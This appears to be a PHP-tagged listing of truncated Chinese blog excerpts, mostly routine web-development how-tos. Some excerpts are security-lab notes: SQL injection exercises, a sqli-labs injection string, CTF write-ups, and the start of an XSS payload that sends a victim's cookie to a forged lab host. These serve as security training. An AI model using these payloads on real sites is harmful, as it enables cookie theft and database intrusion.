PHP
报错注入、布尔盲注、延时注入以及sqlmap的练习
1、演示报错注入查询数据库,使用两种函数实现报错注入 使用ASCII码实现逐一查询数据库名称 2、演示布尔盲注注入出数据库名称的前两个字母,要求使用mysql终端延时每个函数的作用 通过页面显示判断 3、使用延时注入注入出数据库长度,要求使用mysql终端延时每个函数的作用 4、使用sqlmap利用靶场任意一关,注入出mysql数据库的user表内容 5、使用sq
2023CSP 前总结
note:这个月的总结,由于中间似乎因为在从本地 copy 到 fzoi 的过程中,ctrl+A 出现了失误啥的,导致一段时间,同一个内容反复出现。 为了删除重复的部分,极有可能也同时删除了本来就正确的部分,寄。 10.1 上午状态害可以,但是感觉到有点不是非常的集中,想题的时候容易走神。 下午是经典小晕,晚上还行。 感觉今天的题都挺有意思的。 把列表里面的原题也简单看了看。 [IOI2023 集
恢复战场的第一站模拟
A - 玩数字 思路:原题链接:https://atcoder.jp/contests/abc111/tasks/abc111_b ABC 中首次亮相三个相同数字的比赛 -》 也就是输出三个相同的数,且>=本身输入的(= 代表着输入的数就是三个相同数字的),得到公式(n - 110) / 110即可 Code: #include<iostream> using namespa
selenium处理iframe
- 如果定位的标签在iframe中,需要先切换到iframe中 - 切换到iframe: driver.switch_to.frame('iframe的id属性值') -动作链(拖动):from selenium.webdriver import ActionChains - 实例化一个动作链对象 - 执行一系列的动作链操作 - 调用perform()方法执行链中的
easyadmin 无法上传大文件的问题
<span><a class="layui-btn" data-upload="file_url" data-upload-number="one" data-upload-exts="exe|msi|rar|zip|7z" data-upload-icon="image"><i class="fa fa-upload"></i> 上传</
如何(快捷) 检测/识别/选择 文件编码字符集/乱码的中文到底是用什么编码的
16进制编辑器 https://www.v2ex.com/t/807890 Hex Editor Vscode有个扩展叫Hex Editor,可以编辑,但是编辑功能比较难用。而且没法复制16进制形式,只能复制base64形式和原字符串。 右侧data inspector可以看到采用各种编码对应的字符是什么 在线的https://hexed.it/ &nb
xss利用之盗取cookie示例
实验环境 目标网站:宿主机:192.168.10.1 访问 虚拟机win11:192.168.10.134 伪造网站:192.168.10.12:100 pikachu 步骤一: 受害者cookie: 步骤二: 输入xsspayload '"><script>document.location = 'http://192.168.10.12:100/pikachu/pk
应用设置设置https代理
应用设置设置https代理 使用nginx进行https反向代理 准备材料 域名及对应ssl证书 需要https反向代理的应用 nginx配置文件 域名及证书 域名可以从云服务厂商购买,便宜的有几元钱首年的,续费大概在50元左右 一般云服务厂商购买证书后都有可以申请证书,或者执行申请免费证书,并进行域名解析,可以参考各厂商的文档 总结步骤如下: 购买域名 申请ssl证书 得到 *.c
php 生成小程序二维码
public function generate($code, $isShow) { // 构建二维码参数 $scene = 'C=' . $code.'&path=green'; $params = [ "scene" => $scene, 'page' =>
php 后台执行进程
一些业务需要长期在后台执行进程 下面用thinkphp5.1做演示 在command文件夹下建立进程 cd 到 lunar_php项目根目录 执行 php think hello 如果想后台执行 nohup flock -xn /data/www/lock/hello.lock -c "php74 think hello" >> /data/www/lunar
sqli_lab Less1练习笔记
首先观察页面信息,看有没有提示。 很显然,这个页面让我们传入id这个参数(根据题目的分支,应该是get方法) 使用HackBar进行传入参数,首先传入id=1 http://localhost/sqli-labs-master/Less-1/?id=1 发现回显正常 第一步、基础判断 下面进行基础的判断,传入id=1' --+ 回显正常,所以判断为字符型注入 ps:关于如何字符型注入和数字
cURL error 60: SSL certificate problem: unable to get local issuer certifica 解决
cURL error 60: SSL certificate problem: unable to get local issuer certifica 解决 无法获取本地颁发者证书 Windows版本1.到 https://curl.haxx.se/ca/cacert.pem 下载证书文件 cacert.pem,将其保存到 PHP 安装路径下。 2.编辑 php.
开源IT资产管理软件glpi安装(ubuntu22.04)
环境:ubuntu22.04 LTS + mysql5.7(阿里云) 第一步:更新系统 sudo apt update -y sudo apt upgrade -y 第二步:安装php及依赖 sudo apt install -y apache2 php8.1 php8.1-curl php8.1-zip php8.1-gd php8.1-intl php8.1-intl php-pe
facebook, twitter, linkedin等的分享功能
1. facebook分享 方法一:传入参数,此时标题获取的是页面title标签中的内容 方法二:使用meta参数 2. twitter分享 3. linkedin 此时标题获取的是页面title标签中的内容
CTFHUB-web-信息泄露-PHPINFO
开启题目 访问 只有这一个页面,看一下flag在没在页面里 信息发现: https://www.cnblogs.com/Cl0ud/p/15999347.html 系统版本信息 配置文件位置 allow_url_fopen & allow_url_include 文件包含必看选项之一,如果allow_url_fopen和allow_url_include都为On的时候,则文件
[安洵杯 2019]easy_serialize_php
[安洵杯 2019]easy_serialize_php 可控参数有 f,user,function(这里可以利用extract函数进行变量覆盖) 我们查看一下phpinfo里面,发现有个d0g3_f1ag.php文件 基本思路就有了 $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));这里进行sha1加密就不能base64 解码
[网鼎杯 2018]Fakebook
[网鼎杯 2018]Fakebook 考点:sql数字型注入,php序列化,file协议,爬虫协议,源码备份,SSRF 在view.php中发现数字型注入 进行读取数据库数据 测试字段数 读取数据库名(这里union select整体被过滤了) 观察页面,发现只有2位置有回显,接着写语句 爆当前数据库 爆表名 爆字段名 查看字段的值 这里data的值是序列化字符串 发现网
如何使用ilovepdf将PDF转换成word?
我们在办公或学习过程中经常会遇到需要PDF编辑内容的情况,但PDF修改起来特别麻烦,那么这个时候就需要用到PDF转Word。那么,如何将pdf怎么转换成word? ilovepdf中文版是一款免费的在线转换工具,下面说一说如何使用它实现PDF转word。 首先在浏览器搜索ilovepdf或直接打开提前收藏的链接进入首页,点击左侧菜单栏的“转换”(一般默认打开就是这样),选择需要的转换格式“PDF转
图扑数字孪生“光储充”一体化智慧充电站
近年来,蔚来、理想、特斯拉等电动汽车凭借独特的优势已成为全球消费者的“新宠儿”。随着新能源车保有量迅速增长,充电需求不断上升,充电桩对区域电网的冲击也日益显著。 “光储充”一体化模式,即“光伏+储能+汽车充电”,被视为解决新能源汽车与充电桩发展不平衡问题的理想方案。通过储能电站与电网协同供电,实现削峰填谷,解决光伏发电间歇性和不稳定等问题。那么,储能充电站作为电动汽车关键的充电设施,其安全性、
电脑日常:查看端口占用 ,WAMP建站
1. 查看端口占用 程序报错:通常每个套接字地址(协议/网络地址/端口)只允许使用一次。 说明该端口被某个程序占用。 在CMD 中输入netstat -aon|find 10001 查看占用10001端口的进程ID。得到 TCP 0.0.0.0:10001 0.0.0.0:0 &
Linux中安装FTP客户端(转载)
Linux中测试搭建 FTP 服务器,刚安装完 vsftpd 测试登录时就提示“-bash: ftp: command not found”,说明需要安装FTP客户端。 1. http://rpmfind.net/linux/rpm2html/search.php?query=ftp 下载客户端 2. rpm -ivh ftp-0.17-51.1.el6.x86_64.rpm 安装客户端 3. 安
unipp实现map地图轨迹,轨迹长度,标点,连线功能
效果图 一、pages.json文件中加入 pages.json 二、创建子窗体文件mapsubd1.nuve文件 mapsubd1.nvue 三、创建子窗体文件mapsubd2.nuve文件 mapsubd2.nvue 四、创建主窗体文件mapd.nuve文件,注意一定要是nvue文件 mapd.nvue 附php后端部分代码 五、后端数
《安富莱嵌入式周报》第333期:F35战斗机软件使用编程语言占比,开源10V基准电源,不断电运行一年误差小于1uV,Web版开源示波器,RUST在航空航天的应用
周报汇总地址:http://www.armbbs.cn/forum.php?mod=forumdisplay&fid=12&filter=typeid&typeid=104 视频版: https://www.bilibili.com/video/BV1y1421f7ip 目录: 1、F35战斗机软件使用编程语言占比 2、开源10V基准电源,不断电运行一年,
设置PHP最大连接数及php-fpm -static高并发
设置PHP最大连接数及php-fpm 高并发 参数调整 服务器中找到php-fpm.conf配置(有的会在引入的www.conf中) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [global] pid = /usr/local/php/var/run/php-fpm.pid err
CentOS下安装redis 详细步骤
1、前言 Redis版本 6.2.5 服务器版本 Linux CentOS 7.6 64位 2、下载 Redis 下载网址:https://redis.io/download/ 笔者使用wget在线下载 3、解压、安装 3.1 使用 tar 解压压缩包 3.2 进入解压后的目录 3.3 这两个文件的路径要记住,后续会用到 redis.conf 此文件是 Redis 启动必需的一个配置文件。
一套常用的软件版本命名规则
一套常用的软件版本命名规则 最后一个bug 于 2023-03-06 09:10:05 发布 软件版本命名规则由三个部分组成:主版本号、次版本号和修订版本号。 其中,主版本号和次版本号用于指示软件的重大功能和特性的更改,修订版本号则用于指示小的错误修复和改进。 详细软件版本命名规则应该包括以下几个方面: 主版本号:主版本号用于指示软件的重大功能和特性的更改。当进行重大功能和特性更改时